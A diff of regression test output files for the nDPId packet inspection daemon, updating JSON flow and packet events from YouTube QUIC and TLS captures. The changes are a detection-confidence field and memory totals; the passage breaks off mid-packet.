{"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1489363823466,"flow_last_seen":1489363824024,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3933,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1489363824401,"flow_last_seen":1489363824840,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","packets-captured":289,"packets-processed":289,"total-skipped-flows":0,"total-l4-payload-len":179501,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1489363826862} 
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 289/289 @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880088 bytes -~~ total memory freed........: 5880088 bytes -~~ total allocations/frees...: 118414/118414 +~~ total memory allocated....: 6013722 bytes +~~ total memory freed........: 6013722 bytes +~~ total allocations/frees...: 121176/121176 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 2273 chars diff --git a/test/results/youtubeupload.pcap.out b/test/results/youtubeupload.pcap.out index c005d4b75..2b86a68fd 100644 --- a/test/results/youtubeupload.pcap.out +++ b/test/results/youtubeupload.pcap.out 
@@ -2,24 +2,24 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1511102576794} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576794,"flow_last_seen":1511102576794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102576794,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02246{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1511102576794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102576794,"pkt":"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\/D790R+7T+2\/0X2\/pJXF+QSwhgBhJRTmB2QAAAABAAAANVJUT5jAAAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576794,"flow_last_seen":1511102576794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102576794,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576794,"flow_last_seen":1511102576794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102576794,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576835,"flow_last_seen":1511102576835,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1511102576835,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1511102576835,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1511102576835,"pkt":"XEl5dU5q2MuK4S0uCABFAAA0AURAAIAGcnTAqAIbrNkXb+BsAbtWAw9KAAAAAIAC+vClngAAAgQFtAEDAwgBAQQC"} 
02258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1511102576850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102576850,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADkRtX+s2RdvwKgCGwG7ytUFTpL9CJHSvk7nMdgaAY7UOy2eqBjwqYbdQEABH3gBAQD\/\/\/\/6BgCAAVJFSgAIAAAAU1RLADgAAABTTk8AbAAAAFBST0a0AAAAU0NGR1MBAABSUkVKVwEAAFNUVExfAQAAQ1NDVFECAABDUlT\/XwkAAEbxGDSLTF1Q0EvnndIQSTAo6qDgodwKRUkl\/wgXSXZEn9QM2BlHJ5TGchczmqfpPPkVE8tMlsFMfVeayelDb2fy4YzLDv2N+n2kP+GPU+AvJ+LZZRk0N6KyGXGuCIybXc0DgBajeTEN+eTXljBGAiEAu2XBBVnB4JB\/pAM2aIMKtRsM68whkJeFp\/sUQ4KWuigCIQClJ1nIthgBruSaqgIGHfDqWyoEY6pcU10gsmGqIhMu0lNDRkcIAAAAQUVBRAgAAABTQ0lEGAAAAFBETUQcAAAAVEJLUCAAAABQVUJTQwAAAEtFWFNHAAAAT0JJVE8AAABFWFBZVwAAAEFFU0dDQzIw9lqyAICUa+kwugeWBsbKvkNISURUQjEwIAAAhphHmLi5BO0Bd0EZ92vmXccblzalgzbYj90Qfoq9ozBDMjU1MDAwMDAwMDBAFRRaAAAAAAwAAADPfAIAAAAAAADwAHUApLkJkLQYWBSHuxOizGdwCjw1mAT5G9+443fNDsgN3BAAAAFfeBYhgQAABAMARjBEAiBdvW4RdrxYmmjeJbc+3jgs5l6RJLipl3aPIQhj9TtUVgIgA9hjkGDtPgI+WyeFtwtRP0uw9dCVeIWw5SDGQbdmUYsAdwDd6x0reg1PpiCLga2BaHB+Lo6dAdVciI09EcTNtuy+zAAAAV94FiCrAAAEAwBIMEYCIQCUIhZCh2zhmqj0uNpoeUCnAI4TO75j9mv1oMYRKX9EbwIhAIVqH7drJ4DDuKcAhaeeCXOoj8EoQkKnHGLbzkyKPDlhAQEDAeiBYJKSGugAAAAAALsLAAB4u4FGwB+tWGtQE1cUJpBXY6I8VdDyFNEgYZOQAr7wiYpWBawlaIsJ2cBCSCJJwEgVWK3A4KNOsVAVxfdjqlClUhXRURAFClYRHasEpKBgRdBILVjtzS6ETSYz9oczmdmc777Onnvu9527WTQrwFy0TRBKTcQLKrp9dm9xz+ylJ4l0NALQ0SJTNhpMGAZIGIUiTgYb8pXrDXnhuTHeCAI35bB6mBzcF\/AwMggEG8\/l8gN4AQK8oOLyArh8PlZQSS0uRWcy5oK8kSqS5YhoKCFpTNbnCo1cbciulQicavSLSfTLCXLA\/GIy2SCmBhjbXCGAaeAd62cA1adjf2xINJs5VuSOLXMcnO6g0xtjxu1zfIrK71z\/\/lBHSmjev8J8r4IzjW36x8zZNOc0+uStj3j5jQFTCvdXObyJDvLf4usWsNFD234IpYyDUMoYbF1AYEyIMUxgprRFy4BQm1YDYkdGbe4DoxE1cRNlsTkiuSRZgUgwczQwlUpYHofIYWI3ezYnVqbQSIiYI5sjEQfx+cECvhGWo1QwPWhGR4JnLMjJFDVvaGa8k59ILpJp1UisCsNHDL
sjIhoybIah1TiI3NROUJramkR0FPHFOKJkc0BjBojNewCvTYGkdWaA2nxIipzgswQmGLCKYEiTCUa8hmAgaoIhlxEMpYmhNmwBbogkgDbw4BmdwRG5YU9wALQmwaAKwbrZDaEpiARWYJAhC1RqQKaxhmEsggUaGWzDvnEJ\/3lDO54Eq5NBL2JvMBWod+IRjNRQW4MlI+YJ2HmtQqPWiGE\/uSJWoUhEjKk3iJt1gyUaXPYxnAZwNUeMxRakTVIchroY"} 02274{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1511102576851,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102576851,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADkRtX+s2RdvwKgCGwG7ytUFTrHlCJHSvk7nMdgaAjk3HVeItBZp3u\/MM6QBBSEEhrNWhsBytYq44AhiRo+TwCmwTKGEk42JPpys442NKgutZCyRqQAAtRXqaDF9GcRDYiH0Y\/Fi0MLsDELQGJhY4OvQsShgL0wMj6PF4FCw0EDxBIlYDUjOl0D+boN8rExECEHyX7Bo9gIexu6+BD0Z6jwYVS5xhEFjCAVnb9OEZ+1zI6xu60jhXe7FYiEjXGJWdBF1I+wRdfS48r74X1JeZ567KHa5EJ3pD3ngVQyQUTCSgZUFTVprCgmiU6lxmUwgGRCEl12TIR\/Iu8iryOND7yMz0xaswN6jCztbGOmK9M1HAtnb0p6qNH6hov6O7rqWzJfC2lmeHtZeU6WbjsS8u3ntcJQzOr2oWOwTXcLWes24V6eOPFWo8+TNul2fEFLQ78eM1PXs2XQnqjfDqk3auk2v6+r9pEcxm7ylpmzrihbHoOb9i7fucvoKaS0tCfOsbMqMP3nB9ezFL69FLLtTF+p+dsZl1fPc\/DBpqVvY0e9eHrAZ+VA9+k3JGb\/9upojFbdLGEEHzpW4tGy79WmG8IZ+5InTV7teNKN9mWsYUcLOpqcV59uW1kr1OramoTHz1vv11JzRr2tDd4S\/WkfbF2P7ZGza6rI\/j9Us8WXle5QG\/b6jzfNgyphjqo6oKWSDFJMnAQGwxaXYlmTl4Z1d0i88lvqCkib10ZlL8sf48IBpMSTg8YAY8\/iBmBZzeXzwEwQLgqM\/pux\/6Oa0l01OXX1\/+c6p1ENoy\/3lC8tzQnqdlS7ZoRtbdlT15tR7dEe\/E7HKePNyitQjIpd9cbgeFe\/qfiaMud5KybCv\/DovpHzVwiB95N8TOgZ2djpVNugjWfqwt\/tXNG+oKEpUZF25tdxtEmQz6wFdFS5Lfz91+rFA6vZLi+3IzzZMaO745y137UDe3TWvOGHFc27XdlUmuJypi3zktDjX7YazyO23wuMzY303CxB48w3nqlDPN5G7Ktoywmyvs\/+6kO9uVx38oy25qEe0fpf31qURmsfnntNrHN\/WeyacXdoQapOfb7Pxys\/NacXz+Q0XZq4ta9Z7e19lCXIKCwdG2mlzXAOrircnI\/g3DpRkByLCMjmYFj9jDB9zi+fW\/KMGh8A\/npA75EqgFPvB8xrHUWmTYjFShuyNNEGHqOBhDa5jAvygcyBwwyoCN6wtE0wGiocL7zg1ftXFTvv\/oJAPXPQs8EXNovaf7kkkqasq1vY36F29qncjsStini1pcp7kJZFu
H1+dlSGJIedOLC7QMZTl5c4zutP4J9Iv6SmNyouUidqu3dUF52nOcEDd9M6QKlK\/grnxj\/XK1Uve+Vn11FT4bS89njFAcsiu3RvSfjG1ZmrcZ6\/q7\/pYJ88tuiS37l1AWTuTJOy02+fyavOojKMH1wn8z1UfTB\/zTWvuytPdcdnhPtCaI+KIa4F3p3V9yyYFZR1sUJ46vP5m5ZOaqgflXryX78ZeTWvRTfNvvGXb8cOSgXllHhLWeas8yH5iVlRBMCVoVB26EFSw0u7LpTGV75XHW9Nztb6\/wrxD58u4nYzXfW68h\/8B+TYP2QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1511102576862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1511102576862,"pkt":"2MuK4S0uXEl5dU5qCABFAAA0ZyEAADkGk5es2RdvwKgCGwG74GxxouM+VgMPS4ASpxyk0AAAAgQFZAEBBAIBAwMI"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1511102576863,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1511102576863,"pkt":"XEl5dU5q2MuK4S0uCABFAAAoAUhAAIAGcnzAqAIbrNkXb+BsAbtWAw9LcaLjP1AQAQKLbgAAAAAAAAAA"} 
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1511102576835,"flow_last_seen":1511102576864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1511102576864,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1511102576835,"flow_last_seen":1511102576919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1511102576919,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01439{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1511102576835,"flow_last_seen":1511102576921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4258,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1511102576921,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","server_names":"upload.video.google.com,*.clients.google.com,*.docs.google.com,*.drive.google.com,*.gdata.youtube.com,*.googleapis.com,*.photos.google.com,*.upload.google.com,*.upload.youtube.com,*.youtube-3rd-party.com,upload.google.com,upload.youtube.com,uploads.stage.gdata.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=upload.video.google.com","alpn":"h2,http\/1.1","fingerprint":"EE:3E:32:FB:B1:2E:82:EE:DF:FF:C0:1B:27:CD:BF:D8:8A:CB:BD:63"}} 
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1511102576835,"flow_last_seen":1511102576864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1511102576864,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1511102576835,"flow_last_seen":1511102576919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1511102576919,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01439{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1511102576835,"flow_last_seen":1511102576921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4258,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1511102576921,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","server_names":"upload.video.google.com,*.clients.google.com,*.docs.google.com,*.drive.google.com,*.gdata.youtube.com,*.googleapis.com,*.photos.google.com,*.upload.google.com,*.upload.youtube.com,*.youtube-3rd-party.com,upload.google.com,upload.youtube.com,uploads.stage.gdata.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=upload.video.google.com","alpn":"h2,http\/1.1","fingerprint":"EE:3E:32:FB:B1:2E:82:EE:DF:FF:C0:1B:27:CD:BF:D8:8A:CB:BD:63"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102578051,"flow_last_seen":1511102578051,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102578051,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02245{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1511102578051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102578051,"pkt":"XEl5dU5q2MuK4S0uCABFAAViAV5AAIARbSHAqAIbrNkXb\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"} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102578051,"flow_last_seen":1511102578051,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102578051,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}} 
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102578051,"flow_last_seen":1511102578051,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102578051,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}} 02259{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1511102578108,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102578108,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADgRtn+s2RdvwKgCGwG78xgFTs8jCAjRAddSQpCnAZLrpBY0DjIhd5jwe0ABH5UBAQD\/\/\/\/1BgCAAVJFSgAIAAAAU1RLADgAAABTTk8AbAAAAFBST0a0AAAAU0NGR1MBAABSUkVKVwEAAFNUVExfAQAAQ1NDVFECAABDUlT\/XwkAAOdd9OCaMJjZHEuQSnBheExXijy9L8yxcLxijUGUgt7VeQLmXHCE0dSCjTwUu4DOXBlw0HTG62CtZtu2a6Ru1X+sH1IA2FJqDRpGVA5MHyMKc7vKtJZUWy6Wq\/FvJH3N94ZirXYSBfeq9Qo8ATBGAiEAppVGAzltTsobgX744i5bBeIqIDO\/YtwFhdblUPMaf9ECIQDgN5eoKUWZEY4A\/yjD3jA5j4ZdDcRSfqhMU1oZUTGdIVNDRkcIAAAAQUVBRAgAAABTQ0lEGAAAAFBETUQcAAAAVEJLUCAAAABQVUJTQwAAAEtFWFNHAAAAT0JJVE8AAABFWFBZVwAAAEFFU0dDQzIw9lqyAICUa+kwugeWBsbKvkNISURUQjEwIAAAhphHmLi5BO0Bd0EZ92vmXccblzalgzbYj90Qfoq9ozBDMjU1MDAwMDAwMDBAFRRaAAAAAAwAAADNfAIAAAAAAADwAHUApLkJkLQYWBSHuxOizGdwCjw1mAT5G9+443fNDsgN3BAAAAFfeBYhgQAABAMARjBEAiBdvW4RdrxYmmjeJbc+3jgs5l6RJLipl3aPIQhj9TtUVgIgA9hjkGDtPgI+WyeFtwtRP0uw
